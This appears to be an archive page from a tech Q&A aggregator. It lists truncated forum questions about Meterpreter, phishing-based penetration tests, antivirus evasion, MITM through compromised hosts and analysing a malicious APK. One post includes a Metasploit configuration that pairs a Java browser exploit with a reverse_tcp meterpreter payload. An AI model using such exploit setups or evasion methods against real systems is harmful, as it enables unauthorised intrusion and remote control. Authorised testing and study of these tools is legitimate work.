meterpreter – Page 18 – WindowsTechs.com

Auto execute meterpreter commands on session start

Posted on March 3, 2017 by wishchaser

Is there a way to run one or multiple meterpreter commands automatically, as soon as the listener gets a connection (i.e session is established with a target)? I want to run the ‘hide_app_icon’ command as soon as a session is… Continue reading Auto execute meterpreter commands on session start→

Meterpreter session is not valid and will be closed [on hold]

Posted on March 1, 2017 by Mbroo

I use this settings

use multi/browser/java_jre17_jmxbean2
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.100
set srvhost 192.168.1.100
set lport 4444
set srvport 8080

After starting meterpreter session it’s c… Continue reading Meterpreter session is not valid and will be closed [on hold]→

Is it possible to have full LAN access through a meterpreter session? e.g. for a MITM attack

Posted on February 20, 2017 by D.A.

Is it possible to perform a MITM Attack through a compromised Windows Machine in a internal LAN?
How would be the attacker’s scenario? How to do this?

Continue reading Is it possible to have full LAN access through a meterpreter session? e.g. for a MITM attack→

How to find external ip address a payload uses to connect back to the attacker?

Posted on February 8, 2017 by wishchaser

I find myself targeted with a malicious .apk file. I am provided with some malicious files disguised as a genuine .apk.

I used apktool to decompile the file and collect some information about the attacker. I could find none… Continue reading How to find external ip address a payload uses to connect back to the attacker?→

How to find external ip address a payload uses to connect back to the attacker?

Posted on February 8, 2017 by wishchaser

I find myself targeted with a malicious .apk file. I am provided with some malicious files disguised as a genuine .apk.

I used apktool to decompile the file and collect some information about the attacker. I could find none (please point… Continue reading How to find external ip address a payload uses to connect back to the attacker?→

How does 32 bit Meterpreter migrate into 64 bit process?

Posted on January 14, 2017 by ChrisK

If you have an 32bit Meterpreter running on a 64 bit remote system you can migrate into 64 bit processes.

This isn’t anything new and has been used by malware for ages but the thing that makes me think is how does it do this… Continue reading How does 32 bit Meterpreter migrate into 64 bit process?→

How does 32 bit Meterpreter migrate into 64 bit process?

Posted on January 14, 2017 by ChrisK

If you have an 32bit Meterpreter running on a 64 bit remote system you can migrate into 64 bit processes.

Penetration testing of windows ( Corporate systems )

Posted on January 10, 2017 by user1299086

So I am part of the team where in we have to conduct a penetration testing assignment for our client. Basically what he wants from us is to show how we can get into their system with the help of phishing, and for the POC he wants us to show the listener which we set up.

My understanding here is to create an exploit with metasploit -> set up the listener -> send the exploit to users -> make them click the attachment = Boom, we get the shell.

Idea wise this is correct but I am stuck at the execution.

How do I encode my exploit so that I doesn’t get detected by the AV. here I have tried the obvious .exe approach which gets detected and deleted immediately. similarly I tried binding it with a pdf which also got detected by the AV.
Secondly I am using dynamic IP. In-order to to get it working I tried no-ip which has changed to now-dns and created a host name against my ip. I am not clear to what do I do next, I entered the host name in the listener ip, but how will I get the shell or the listener.
Suggestions for the ideal exploit in this scenario – are there any other approaches that I can consider in this case which could help in getting the desired result.

Feel free to correct me if I am wrong at anyplace. I am new in this area so could have missed few things.

Continue reading Penetration testing of windows ( Corporate systems )→

Meterpreter HTTPS detected by IPS

Posted on January 9, 2017 by Wealot

I am busy with security testing on a clients network and was asked to show how “easy” AV evasion is. I created a nice powershell reverse HTTPS file through veil-evasion, which is not detected by the Symantec virusscanner (tes… Continue reading Meterpreter HTTPS detected by IPS→

Meterpreter HTTPS detected by IPS

Posted on January 9, 2017 by Wealot